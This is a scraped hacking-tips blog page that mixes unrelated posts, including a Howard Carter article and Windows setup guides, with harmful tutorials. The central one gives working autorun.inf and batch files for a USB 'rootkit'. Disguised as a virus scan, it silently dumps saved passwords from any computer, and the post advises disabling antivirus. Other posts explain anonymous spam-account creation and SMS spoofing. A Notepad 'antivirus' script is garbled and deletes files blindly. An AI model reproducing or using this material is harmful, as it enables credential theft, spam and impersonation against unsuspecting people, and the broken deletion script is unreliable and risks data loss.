Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


Howard Carter celebrated by Google

howard-carter
The birthday of Howard Carter is celebrated by Google today.
Carter was already a distinguished archaeologist and Egyptologist, when he became famous for his discovery of the Tomb of Tutankhamun, the most intact Pharaonic tomb ever found.
At age 17 he began recording tomb decorations of the Middle Kingdom period, and then a year later, in 1892, he began work in Armana, documenting what remained of the capital city of Akhenaten – the father of Tutankhamun.
On 4 November 1922, Carter discovered the entrance of what was then designated as KV62. Noting that the tomb seals were intact, he contacted Lord Carnavon, who had funded Carter’s work for nearly 15 years, to come and enter the tomb as it was opened directly.
On 26th November, Carter breached the seals, revealing the massive horde of ancient treasure still intact.
The discovery caused a sensation and resulted in a massive cultural interest in Ancient Eygpt. The treasures from the tomb were exhibited around the world in the years after, before mostly being put on permanent display in the Egyptian Museum of Antiquities in Cairo.
The clearance of the tomb with its thousands of objects continued until 1932. Following his sensational discovery, Howard Carter retired from archaeology and became a part-time agent for collectors and museums.
Howard Carter died of lymphoma, a type of cancer, in Kensington, London, on 2 March 1939 at the age of 64. On his gravestone is written: “May your spirit live, May you spend millions of years, You who love Thebes, Sitting with your face to the north wind, Your eyes beholding happiness”.

Howard Carter celebrated in Google doodle

Google homepage graphic pays tribute to archaeologist who discovered Tutankhamun's tomb in 1922

Howard Carter celebrated in a Google Doodle
Howard Carter celebrated in a Google doodle. Photograph: Screengrab
The birthday of Howard Carter, who discovered the tomb of Tutankhamun in 1922, is celebrated in the latest Google doodle, a colourful graphic depicting the British archaeologist admiring an array of ancient Egyptian treasures.
The unearthing of the tomb, which had been undisturbed for more than 3,000 years, was the first time that the final resting place of a pharaoh and all his treasures had been found by modern-day archaeologists.
Carter, who was born on 9 May 1874 in London, originally trained as an artist and was sent to Egypt at the age of 17 to assist in the excavation and recording of ancient Egyptian tombs. He was appointed as the first chief inspector of the Egyptian Antiquities Service (EAS) in 1899 and supervised a number of excavations at Thebes, now known as Luxor, before he was transferred in 1904 to the Inspectorate of Lower Egypt.
He was employed from 1907 by Lord Carnarvon to supervise his Egyptian excavations but came under pressure to make a major breakthrough after what the aristocrat regarded as a series of disappointing results.
It came in November 1922, when Carter wrote in his pocket diary: "Discovered tomb under tomb of Ramsses VI investigated same & found seals intact."
He is said recorded as having made the breach into the tomb with a chisel his grandmother had given him for his 17th birthday.
Asked by Carnarvon: "Can you see anything?", archaeologist replied with the now-famous words: "Yes, wonderful things."
Carter then became the first human in 33 centuries to enter the tomb, and spent years documenting the thousands of artefacts from the tomb.
A total of 5,398 objects were found, covering every aspect of ancient Egyptian life, from weapons and chariots to musical instruments, clothes, cosmetics and a treasured lock of the royal grandmother's hair.
He died from Lymphoma in 1939 at the age of 64, just seven years after his excavation ended, and before he could fully publish his findings.
Carter's complete records of the excavation were deposited in the Griffith Institute Archive at the University of Oxford, which has been building an online database.

How to Sniff Passwords Using USB Drive


Hack Password using USB DriveAs we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
::::::CLICK ON SUBSCRIBE BUTTON PLEASE::::

Install Windows 7 from a Pendrive / Create a bootable Pendrive to install Windows 7

Here is a small and working tutorial to install windows 7 from a bootable USB or Pendrive. These days most of them have a USB or Pendrive. So why don’t you try this trick. Earlier i have posted on How to Install vista from a Pendrive. Installing Windows 7 using a pendrive is very much faster than that from DVD/CD. You just need to follow some small steps to do this. You can keep this pendrive/USB drive for future installation of Windows 7. If you are a beginner or dont want to get messed up by typing in all commands, here is a Free Utility To Create A Bootable USB To Install Windows 7, Vista & Server 2008. This tool will help you to automate the process of bootable pendrive’s and you can install windows 7 from pendrive easily. If not you can follow this guide to install windows 7 from a pendrive.


Make sure you have a Pendrive or USB drive with a minimum of 4 GB space and you have the Windows 7 installation DVD. This tutorial is best suited if you have a Windows 7 DVD with you else you need to change it


  1. Format the Pendrive or USB drive in NTFS format first.
  2. From the start menu right click on the command prompt and select “Run as administrator“.
  3. Now type the following commands (Press enter key after each command).
  4. diskpart. This is to open the disk partition program.
  5. Now to show the list of drives type list disk.
  6. You can see disk’s listed there. Note down the disk number of your pendrive eg. Disk .
  7. Now type SELECT DISK X (where X is the number you noted down for the pendrive from step 5)
  8. Now type CLEAN.
  9. Now type the following commands by pressing enter after each one.
  10. CREATE PARTITION PRIMARY
  11. SELECT PARTITION 1 (Assuming your pendrive/ USB drive is 1).
  12. ACTIVE
  13. FORMAT FS=NTFS
  14. ASSIGN
  15. EXIT(Now the disk partition program will exit). Now we need to give some more commands.
  16. Now insert the Windows 7 Installation DVD and to your DVD drive.
  17. Here i am assuming DVD drive as G and Pendrive as I.(Change it accordingly).
  18. Now type G:CD BOOT
  19. Now type this command BOOTSECT.EXE/NT60 I: to update your USB drive with bootmgr code.
  20. Finally copy all the contents from the Windows 7 DVD to your Pendrive. Make sure you don’t cause any errors.
  21. Plug / Insert your pendrive to your PC and restart the system.
  22. Now Enter the Bios system accordingly by pressing the key delete.(This may vary some times it will be F2 or F12. It depends on the type of your system. Any how during the start up your system will display which key to press to enter the Bios).
  23. Now select the USB/ Pendrive as the first boot driver.(Set the first boot priority to USB drive.).
  24. Now save the settings in Bios and restart and you will be able to Install Windows 7 using that pendrive.
If you liked it make a comment . Feel Free to ask if you have any doubts. I will Try my best to Help You.

CLICK ON SUBSCRIBE BUTTON TO GET MORE UPDATES

Unhide Files in Virus Infected Pendrive Using Command Prompt

Majority of computer users nowadays uses USB flash memory's like pendrives for transferring data, movies, games documents and more.. The only disadvantage of using this kind of memory is that most of these Flash disk's have write protection or virus protection in it.


If you have some nasty virus on USB drive that hide all your file in the drive? ie; hides your files and folders, creates exe file extensions of your folders and even corrupt your files. You can view these files by going to Tools>>Filder Options ..But the attributes of these files often stay unchanged even if you uncheck hidden attribute on file/folder properties.

One sure way to retrieve your file or folder attributes back to unhidden is to use command prompt in windows. All you have to do is described below in steps.

STEP 1:
Plug your pendrive to USB port of your computer. Make sure it is detected.

STEP 2:

Start command prompt by Click Start>>Run and type cmd then hit enter.

STEP3
Find the drive letter for the conected USB drive. For example, G:
In command prompt, type G:
Then type
attrib -s -h /s /d *.*

Make sure that you put space between each elements in the code.
hit enter, wait a moment and this should unhide all your files on your pendrive. Checkout the screenshot for more to clarify.

CLICK ON SUBSCRIBE BUTTON 

USING BLACKBERRY MESSENGER ON COMPUTER

While you're busy doing something on the computer, sometimes you also have to reply to incoming messages on Blackberry Messenger. So it must go back and forth between the computer and Blackberry.

With an Application called Fixmo Web Messenger, you do not bother using a Blackberry and computer, because you can access the fuel through the computer, so that will make you more easily and quickly reply to any message in the fuel through Computer.

Here are the easy steps to you:
1. Download an application called Fixmo Web Messenger for your BlackBerry.

2. install Fixmo Web Messenger on the Blackberry, then run the application and make an account using your email.

3. From your computer, visit Fixmo after that login using the account you created on the Blackberry (Step 2) above.

With the above steps, you can now use the Blackberry Messenger from your computer, such as replying to the message to access the contacts on BBM.

EASY TO MAKE SPAM MAIL

We certainly annoyed when receiving junk email (spam) repeatedly to our inbox mail. In addition, spam emails often inserted by destructive virus. Now! To create spam mail is very easy. Less than 5 minutes, we've been able to send spam emails without worrying about our identity will be detected. (Remember!!. This tutorial is only for education).

We need the help of Mail Creator. This software will help us to create many email addresses. Amazingly, creating this email is without any verification process. So, the owner of the email will be difficult to be identified.

Once the download is complete, install on the computer and follow these steps:

1. On the display screen of Mail creator, remove the check mark in the "Random PWS"

2. Write the number of emails that you want to create in the "How Many" box, then press Create button Mails "

3. After generating process is complete, you will see the email that You make with @usa.net vendor

4. Click the check box between the list of email addresses and passwords

5. Then, save the email address to the computer by pressing the Save UserNs button.

6. Visit Netaddress to start using email. Enter your account one hat you created and fill in the correct password.

You already have a spam email account and you can start sending email to the destination address. To get very much email addresses, you can also pass up on facebook or mailing list.

EASY TO SEND FAKE SMS TO ALL NUMBER

Yes, Spoofing SMS is a simple step to send a message anonymously using a fake phone number or the number belongs to someone else to anyone. With spoofing SMS you can send SMS to HP using the phone number to anyone.

Actually there is no special trick to run Spoofing SMS. In this way, we only use the service company who forgot to send free SMS includes SMS sender ID. So, this one allows us to send SMS from any number to any number.

SMS spoofing features:

a. Capable of sending fake SMS
b. 100% anonymous messages are
c. Sending message to world network

To run it:
A. First of all, register here.
2. After registration, you will get 25 free SMS quota which means you can send just 25 SMS free from any number to any number. In order to obtain additional quota and use them later, you need to register again with a new ID.
Also Read How To Send Free SMS From Facebook




PLEASE CLICK ON BELOW BUTTON FIRST

TAKE ADVANTAGE OF FREE SMS FEATURE VIA FACEBOOK

Facebook fever have mushroomed in such a way in the association development. Communication between persons through facebook more interest than on other social networking sites.

Facebook fever would be even better if added with a feature such as "free SMS via Facebook." This feature will be very useful if we will chat with an offline friend. So the message will still be up to him.

Free SMS is provided by dodotext, a free SMS provider via Facebook, Friendster and dodotext mobile applications. Dodo text is an online service owned by Tactica Labs Pte Ltd Singapora origin serving GSM SMS to the number of all countries around the world for free.

To use SMS dodotext via facebook:

1. Visit Dodotext
2. Click the Facebook link in the Add Our Facebook Application
3. Log into your Facebook account
4. Press the Allow button to allow entry into the facebook application
5. Then add the application to the profile.

To start an SMS, SMS settings first destination country, destination phone number, and type your message (max 100 characters), then press the Send SMS.

Additional features for free SMS via Friendster is not much different with facebook. Whereas for use dodotext mobile SMS applications, we need to register first and will get 5 free SMS every day. Let's try it now ..!


CLICK ON BELOW BUTTON PLZ 

SOME FACEBOOK CHAT APPLICATIONS IN BLACKBERRY FOR FREE

Chat with friends on Facebook is very exciting. However, the constraints have to sit long at a computer and a limited time becomes one of the obstacles met in the pleasure with friends in cyberspace.

With the presence of the Blackberry smartphone technology, this constraint disappears. Moreover, there are some free applications that can be accessed via mobile phones blackberry. In fact, most applications are able to integrate with Blackberry messenger (BBM).

Here are some of Facebook Chat applications on Blackberry Smartphones

1. mChat 1.2.3: this application is one hundred percent free. Although free, we would not be disturbed by the ads that often appear in several free applications. Not only that, we can also update the status of this application. The file capacity is only 705 KB, so, this application can installed on blackberry mobile phone has limited memory. Download at www.blackberry.com/appworld or directly on the site www.mchat.com

2. Facebook Chat For Free: The application is very flexible in use on the blackberry because all facilities are the same as the Blackberry Messenger. In fact, we do not need to move a window (window) chat while chatting with friends on Facebook as well as fuel either, because these applications are integrated with the fuel. Download at www.blackberry.com/appworld or at: www.smarter-apps.com

3. Free Chat For Free With BBM (BBM CFF): This application can say 100 percent integrated with the fuel. Not only the looks alone, but other facilities such as autotext (OS.5) or Word Substitution (0S.6), avatar icons can also be applied here. Amazingly, this application can differentiate our chat friends who are using Blackberry while chatting or not. Download www.blackberry.com/appworld or in CFF Fuel: www.msonar.com

4. FriendChat: This application will run fine on Blackberry OS 6.0. Besides having the same facility with a variety of other facebook chat application, this application can be sent to the fuel facebook chat screen. In addition. FrienChat support multi chat system to chat with some friends on Facebook simultaneously at once. Download at www.blackberry.com/appworld or at: www.jaredcompany.com

In addition to the above four applications, facebook chat is still a lot of other applications that can be fused with a Blackberry. May be useful!


CLICK ON SUBSCRIBE BUTTON BLOW

UPGRADE WINDOWS 7 PERFORMANCE WITH VIRTUAL MEMORY

One way to improve windows 7 performance is to add virtual memory. Virtual memory is additional memory that is taken from hard drive free space. Windows provides this facility to support performance of computer (PC or Notebook).

By default, Windows will allocate space on the disk according to the minimum requirements of Windows. By manual setting, we can increase the virtual space of computer memory. Virtual memory will be used by windows automatically when the physical memory has been fully used by the application windows. By increasing the virtual memory, we can avoid the appearance of the message "low virtual memory ...".

Here is a step to increase virtual memory on windows 7:

1. Right click on computer icon, select Properties

2. Select Advanced System Settings

3. Select the Advanced tabulation, Select the Settings button ..

4. In the Performance Options dialog box In the Virtual memory section select the Change button...

5. Uncheck "automatically manage paging file size for all drives"
Select the Custom size option. Then the contents of the initial size (MB): 1000 (adjust the capacity of free space on your hard drive). Fill in the maximum size (MB): 2000 (adjust the capacity of free space on your hard drive can be larger or smaller than the value)

6. Click Set button. Select OK

7. Restart computer

Click On Below Button Plz

FIX 50 ERRORS ON WINDOWS VISTA WINDOWS 7

FixWin is a software utility that use to correct 50 errors in Windows Vista and Windows 7 for free. This software works only in minutes, depending on the type of error on windows 7 and vista.

Several types of errors such as:

1. Recycle Bin can not be cleaned normally

2. Right-click menu does not appear in the browser Internet Explorer from the contextual menu is disabled by windows

3. Windows Media Center can not update the database, or there is no confirmation dialog box when deleting files

4. Task Manager, Registry Editor CMD or inactive.

5. and so forth.

By using the FixWin Utility, the problems on windows vista and windows 7 can be overcome.

In the software there are several categories of errors such as Windows Explorer, Internet: Connectivity, Windows Media, System Tools & Misc Additional Fixes.

Download Fix Win

CLICK ON SUBSCRIBE BUTTON PLZ!

How to Make a Simple Antivirus With Notepad In Simple Steps


The Notepad antivirus in action
The Notepad antivirus in actionAre you too lazy or you don't want to spend money for an antivirus software? Don't worry, because you can make one with Notepad just by copy-pasting a simple code! Read on if you want to try.




  1. Open Notepad

  2. 2
    Type in the code shown in the next step(if you want, change the parts that say "Antivirus" and "Your name" into the name you want the AV to be called and "Your name" into your real name (e.g. John Smith):
  3. 3
    echo off.
    echo off.
    @echo off
    • title Antivirus
    • echo Antivirus
    • echo created by your name
    •  :start
    • IF EXIST virus.bat goto infected
    • IF NOT EXIST virus.bat goto clean
    • cd C:\Windows\system32
    •  :infected
    • echo WARNING VIRUS DETECTED!
    • del virus.bat
    • pause
    • goto start
    •  :clean
    • echo System secure!
    • pause
    • exit
  4. 4
    Change the "Save as type" section into "All Files," with the file name being [insert your antivirus name here].bat
  5. 5
    (You have to put .bat)
  6. 6
    Find the file and open it. You will see a Command Prompt Window doing a scan.
  7. 7
    Enjoy!








Warnings
  • You can't entirely rely on this. If you want, you can download a real antivirus from the Internet (like Norton, AVG, Avast, etc.)


Things You'll Need

  • A computer running any Windows operating system
Click On Subscribe Button Plz!

CREATE ANTI VIRUS WITH NOTEPAD


There are simple ways to clean viruses in our computers. We can make your own antivirus with software built using the Windows named Notepad. Apart from minor product files, notepad can save files to a variety of other applications programs, such as html, java script and so on.

However, the virus that can be eliminated by our anti-virus is only a low level as macro viruses and an equal. For heavy virus, would have to use anti-virus that is more powerful. However, these tutorials can teach you the basic knowledge about how the anti-virus.

Type the following code into Notepad:

@ echo off
echo off turn off the active virus
taskkill / F / IM virusname1.exe / IM virusname2.exe
echo Deleting all of viruses based on size
for / RC: \%% a in (*. exe) do if%% ~ za 157,184 equ del / A: HSRA "%% a"
echo deleting hidden virus
echo for drive c and subfolders
for / R C: \%% a in (*. doc.exe) do del "%% a"
echo for drive d and subfolders
for / R D: \%% a in (*. doc.exe) do del "%% a"
echo Unhide Document
cd / d c: \
echo for drive C and subfolders
*. doc attrib-H-S-A / S
cd / d d: \
echo for drive D and subfolders
*. doc attrib-H-S-A / S
exit


Save the file with bat extension, For example antivirus.bat. then go to command prompt and run the Notepad file.

Don't Forget To Click On Subscribe Button Plz!

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More